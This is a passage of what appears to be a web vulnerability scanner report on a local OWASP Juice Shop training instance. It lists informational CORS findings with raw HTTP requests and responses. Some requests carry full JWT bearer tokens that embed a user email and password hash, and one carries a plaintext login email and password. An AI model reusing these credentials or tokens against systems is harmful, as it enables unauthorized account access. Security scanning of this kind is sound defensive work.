    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:37 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.87. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:38 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.88. http://192.168.61.143:3000/public/images/products/bower_components/jquery/dist/jquery.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/jquery/dist/jquery.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/jquery/dist/jquery.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:18:50 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.89. http://192.168.61.143:3000/public/images/products/bower_components/moment/min/moment.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/moment/min/moment.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/moment/min/moment.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:03 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.90. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:09 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.91. http://192.168.61.143:3000/public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:10 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.92. http://192.168.61.143:3000/public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:19 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.93. http://192.168.61.143:3000/public/images/products/bower_components/qrcode-generator/js/qrcode.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/qrcode-generator/js/qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:35 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.94. http://192.168.61.143:3000/public/images/products/bower_components/string/dist/string.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/string/dist/string.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/string/dist/string.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:40 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.95. http://192.168.61.143:3000/public/images/products/bower_components/underscore/underscore.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/bower_components/underscore/underscore.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/bower_components/underscore/underscore.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:41 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.96. http://192.168.61.143:3000/public/images/products/css/app.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/css/app.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/css/app.css HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:19:52 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.97. http://192.168.61.143:3000/public/images/products/dist/juice-shop.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/dist/juice-shop.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:20:09 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.98. http://192.168.61.143:3000/redirect

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /redirect

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /redirect HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 500 Internal Server Error
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: text/html; charset=utf-8
    Date: Sun, 15 Jan 2017 21:20:14 GMT
    Connection: close
    Content-Length: 1923

    <html>
    <head>
    <meta charset='utf-8'>
    <title>TypeError: Cannot read property &#39;indexOf&#39; of undefined</title>
    <style>* {
    margin: 0;
    padding: 0;
    outline: 0;
    }

    body {
    paddin
    ...[SNIP]...
    15.99. http://192.168.61.143:3000/rest/admin/application-version

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/admin/application-version

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/admin/application-version HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-None-Match: W/"14-7sFzBTJmHd4ipuzu+uHz+Q"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    ETag: W/"14-7sFzBTJmHd4ipuzu+uHz+Q"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.100. http://192.168.61.143:3000/rest/basket/4

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/basket/4

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/basket/4 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 153
    ETag: W/"99-/EyBecKDYmesnlS6nA35eA"
    Date: Sun, 15 Jan 2017 21:01:15 GMT
    Connection: close

    {"status":"success","data":{"id":4,"coupon":null,"createdAt":"2017-01-15T21:01:01.000Z","updatedAt":"2017-01-15T21:01:01.000Z","UserId":7,"products":[]}}
    15.101. http://192.168.61.143:3000/rest/basket/4/checkout

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/basket/4/checkout

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /rest/basket/4/checkout HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    Content-Length: 0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: text/html; charset=utf-8
    Content-Length: 47
    ETag: W/"2f-E73nQCeKzZ40wOI8tNHL7g"
    Date: Sun, 15 Jan 2017 21:01:56 GMT
    Connection: close

    /ftp/order_30d296d845a9e4ca118e2f91484e0107.pdf
    15.102. http://192.168.61.143:3000/rest/product/search

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/product/search

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/product/search?q=undefined HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    If-None-Match: W/"13d5-B1vmMiFMKgf/am+oDgqthA"

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    ETag: W/"13d5-B1vmMiFMKgf/am+oDgqthA"
    Date: Sun, 15 Jan 2017 21:01:01 GMT
    Connection: close

    15.103. http://192.168.61.143:3000/rest/user/login

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/user/login

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /rest/user/login HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 69
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
